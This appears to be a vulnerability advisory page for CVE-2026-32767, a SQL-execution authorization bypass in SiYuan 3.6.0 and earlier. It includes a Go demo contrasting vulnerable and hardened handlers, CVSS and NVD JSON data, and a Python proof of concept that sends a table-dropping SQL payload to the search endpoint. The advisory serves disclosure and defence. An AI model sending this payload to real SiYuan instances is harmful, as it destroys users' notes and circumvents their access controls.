Security Vulnerability Report
CVE-2026-32767 CVSS 9.8 CRITICAL

Published: 2026-03-20 01:15:56
Last Modified: 2026-03-23 15:23:44

Description

SiYuan is a personal knowledge management system. Versions 3.6.0 and below contain an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user — including those with the Reader role — to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database. This is inconsistent with the application's own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, but the search endpoint bypasses these controls entirely. This issue has been fixed in version 3.6.1.
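The following Go program is an added illustration written for this page, not SiYuan's own code (the project uses a different HTTP framework and a real SQLite connection). It models the flaw the description gives: a search handler whose `method == 2` branch hands the `query` string to the database with no gate, beside the same handler with that branch routed through stand-ins for the `CheckAdminRole` and `CheckReadonly` checks that `/api/query/sql` already enforces. The request body shape follows the PoC below; the `X-Role` header, the `fakeDB` recorder, and the bodies of the two middleware functions are assumptions made for this example only.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
)

// Request body as the PoC on this page sends it: {"method": 2, "query": "<sql>"}.
type searchRequest struct {
	Method int    `json:"method"`
	Query  string `json:"query"`
}

// fakeDB stands in for SiYuan's SQLite database; it only records what reached it.
type fakeDB struct{ executed []string }

func (d *fakeDB) Exec(sql string) { d.executed = append(d.executed, sql) }

// isAdmin replaces the real session lookup: the role comes from a constructed
// X-Role header (an assumption made for this example only).
func isAdmin(r *http.Request) bool { return r.Header.Get("X-Role") == "admin" }

// checkAdminRole and checkReadonly play the part of the two middlewares the
// description names for /api/query/sql; SiYuan's real ones are not shown here.
func checkAdminRole(next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if !isAdmin(r) {
			http.Error(w, "admin role required", http.StatusForbidden)
			return
		}
		next(w, r)
	}
}

func checkReadonly(readonly *bool, next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if *readonly {
			http.Error(w, "instance is read-only", http.StatusForbidden)
			return
		}
		next(w, r)
	}
}

// searchHandler builds the endpoint. With gated=false it behaves like the
// affected releases (<= 3.6.0): method 2 hands the query to the database with
// no authorization or read-only check. With gated=true the raw-SQL branch runs
// behind the same gates the dedicated SQL endpoint already enforces, while the
// ordinary search methods are left untouched.
func searchHandler(db *fakeDB, readonly *bool, gated bool) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		var req searchRequest
		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
			http.Error(w, err.Error(), http.StatusBadRequest)
			return
		}
		if req.Method != 2 {
			w.WriteHeader(http.StatusOK) // ordinary full-text search path (stub)
			return
		}
		runSQL := func(w http.ResponseWriter, _ *http.Request) {
			db.Exec(req.Query)
			w.WriteHeader(http.StatusOK)
		}
		if gated {
			checkAdminRole(checkReadonly(readonly, runSQL))(w, r)
			return
		}
		runSQL(w, r) // vulnerable path: any authenticated caller reaches the database
	}
}

// post drives a handler with a constructed request and returns the HTTP status.
func post(h http.HandlerFunc, role string, method int, query string) int {
	body, _ := json.Marshal(searchRequest{Method: method, Query: query})
	r := httptest.NewRequest(http.MethodPost, "/api/search/fullTextSearchBlock", bytes.NewReader(body))
	r.Header.Set("Content-Type", "application/json")
	r.Header.Set("X-Role", role)
	w := httptest.NewRecorder()
	h(w, r)
	return w.Code
}

func main() {
	readonly := false
	vuln, fixed := &fakeDB{}, &fakeDB{}
	payload := "SELECT * FROM blocks; DROP TABLE blocks; --"
	fmt.Println("vulnerable, reader, method 2:", post(searchHandler(vuln, &readonly, false), "reader", 2, payload), vuln.executed)
	fmt.Println("hardened,   reader, method 2:", post(searchHandler(fixed, &readonly, true), "reader", 2, payload), fixed.executed)
	fmt.Println("hardened,   admin,  method 2:", post(searchHandler(fixed, &readonly, true), "admin", 2, "SELECT 1"), fixed.executed)
}
```

The point of the hardened variant is that the raw-SQL branch is not given a new, separate check but is wrapped in exactly the gates the dedicated SQL endpoint uses, so the two entry points cannot drift apart again; rejecting `method == 2` outright for non-admin callers would be an equally valid, narrower fix.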

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weaknesses
CWE-89 (SQL Injection), CWE-863 (Incorrect Authorization)

Note: the vector records PR:N (no privileges required), but the description states that the request must come from an authenticated user, with the Reader role being sufficient. In practice an attacker needs a valid account or session token on the target instance, so read the score with that precondition in mind.

Configurations (Affected Products)

cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:* - VULNERABLE
SiYuan <= 3.6.0 (every release before 3.6.1; fixed in 3.6.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (default SiYuan port is 6806)
target_url = "http://localhost:6806/api/search/fullTextSearchBlock"

# A valid session is required: this is an authorization bypass, not an
# authentication bypass. The header below is as given on this page; adjust it
# to whatever credential form the target instance actually accepts.
headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer YOUR_VALID_SESSION_TOKEN_HERE",
}

# Exploit payload: method 2 selects the raw SQL execution path and 'query'
# is passed to SQLite as-is. WARNING: this statement is destructive (it drops
# the blocks table). To confirm the flaw on a system you are authorized to
# test without damaging it, substitute a harmless statement such as "SELECT 1".
payload = {
    "method": 2,
    "query": "SELECT * FROM blocks; DROP TABLE blocks; --",
}

try:
    response = requests.post(target_url, headers=headers, json=payload, timeout=10)
    if response.status_code == 200:
        # An HTTP 200 on its own is not proof of execution; inspect the body to
        # confirm the statement ran rather than being rejected by the application.
        print("[+] Request accepted (HTTP 200). Response body:")
        print(response.text)
    else:
        print("[-] Exploit failed or server returned an error.")
        print("[-] Status Code:", response.status_code)
except requests.RequestException as e:
    print(f"[-] An error occurred: {e}")

References

Patch: https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5
Issue Tracking: https://github.com/siyuan-note/siyuan/issues/17209
Release Notes: https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1
Vendor Advisory (Exploit, Mitigation): https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-32767",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T01:15:55.597",
    "lastModified": "2026-03-23T15:23:44.380",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SiYuan is a personal knowledge management system. Versions 3.6.0 and below contain an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user — including those with the Reader role — to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database. This is inconsistent with the application's own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, but the search endpoint bypasses these controls entirely. This issue has been fixed in version 3.6.1."
      },
      {
        "lang": "es",
        "value": "SiYuan es un sistema de gestión de conocimiento personal. Las versiones 3.6.0 e inferiores contienen una vulnerabilidad de omisión de autorización en el endpoint /api/search/fullTextSearchBlock. Cuando el parámetro method se establece en 2, el endpoint pasa la entrada proporcionada por el usuario directamente como una sentencia SQL sin procesar a la base de datos SQLite subyacente sin ninguna autorización ni comprobación de solo lectura. Esto permite a cualquier usuario autenticado — incluidos aquellos con el rol de Lector — ejecutar sentencias SQL arbitrarias (SELECT, DELETE, UPDATE, DROP TABLE, etc.) contra la base de datos de la aplicación. Esto es inconsistente con el propio modelo de seguridad de la aplicación: el endpoint SQL dedicado (/api/query/sql) requiere correctamente el middleware CheckAdminRole y CheckReadonly, pero el endpoint de búsqueda omite estos controles por completo. Este problema ha sido solucionado en la versión 3.6.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-89"},
          {"lang": "en", "value": "CWE-863"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "3.6.1",
                "matchCriteriaId": "E1AA6470-222A-4841-A487-DF65F9859780"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/siyuan-note/siyuan/issues/17209",
        "source": "[email protected]",
        "tags": ["Issue Tracking"]
      },
      {
        "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}